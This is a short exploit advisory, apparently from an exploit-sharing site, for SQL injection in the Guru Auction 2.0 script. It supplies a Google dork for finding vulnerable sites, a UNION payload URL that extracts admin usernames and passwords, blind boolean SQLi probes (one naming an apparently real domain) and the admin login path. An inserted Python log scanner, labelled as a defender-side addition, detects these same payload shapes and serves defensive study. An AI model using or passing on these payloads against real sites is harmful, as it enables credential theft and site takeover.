Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
Author : v3n0m
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

Blind SQLi p0c:
~~~~~~~~~~
http://www.political-security.com/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
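A defender-side check for the two injection shapes shown above (added example, not part of the original post): it parses combined-format access log lines, decodes the cate_id / item_id parameters of subcat.php and detail.php, and flags UNION-based and boolean-based payloads as well as any non-integer id. The /shop/ path prefix and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts and parameters the advisory names as injectable. The /shop/ prefix used
# in the sample log is an assumption; only the script name matters for the check.
INJECTABLE = {"subcat.php": "cate_id", "detail.php": "item_id"}

# UNION-based extraction, as in the first PoC ...
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)
# ... and boolean-based blind probes (AND <expr>=<value>), as in the second.
BOOLEAN_RE = re.compile(r"\b(and|or)\b\s+[\w@(),.']+\s*=\s*[\w']+", re.IGNORECASE)
# Apache/nginx combined log format, as far as this check needs it.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(target):
    """Classify one request target: 'union', 'boolean', 'non-numeric' or None."""
    parts = urlsplit(target)
    param = INJECTABLE.get(parts.path.rsplit("/", 1)[-1])
    if param is None:
        return None
    # parse_qs turns '+' into spaces and decodes %XX, so encoded variants are caught too.
    for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        if UNION_RE.search(value):
            return "union"
        if BOOLEAN_RE.search(value):
            return "boolean"
        if value and not re.fullmatch(r"-?\d+", value):
            return "non-numeric"  # both ids are integers; anything else is worth a look
    return None

def scan(lines):
    """Return (ip, script, kind) for every suspicious request in the given log lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify(m.group("target"))
        if kind:
            hits.append((m.group("ip"), urlsplit(m.group("target")).path.rsplit("/", 1)[-1], kind))
    return hits

# Constructed sample log: one benign request, the two PoC shapes from the advisory,
# and a stray quote in the id (the classic first probe before a blind payload).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2010:10:00:01 +0000] "GET /shop/detail.php?item_id=575 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2010:10:00:02 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin-- HTTP/1.1" 200 812
203.0.113.7 - - [01/Jan/2010:10:00:03 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2010:10:00:04 +0000] "GET /shop/detail.php?item_id=575%27 HTTP/1.1" 500 0
"""

if __name__ == "__main__":
    for ip, script, kind in scan(SAMPLE_LOG.splitlines()):
        print(f"{ip} {script} {kind}")
```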

Admin login entry:
~~~~~~~~~~
http://domain.tld/[path]/admin/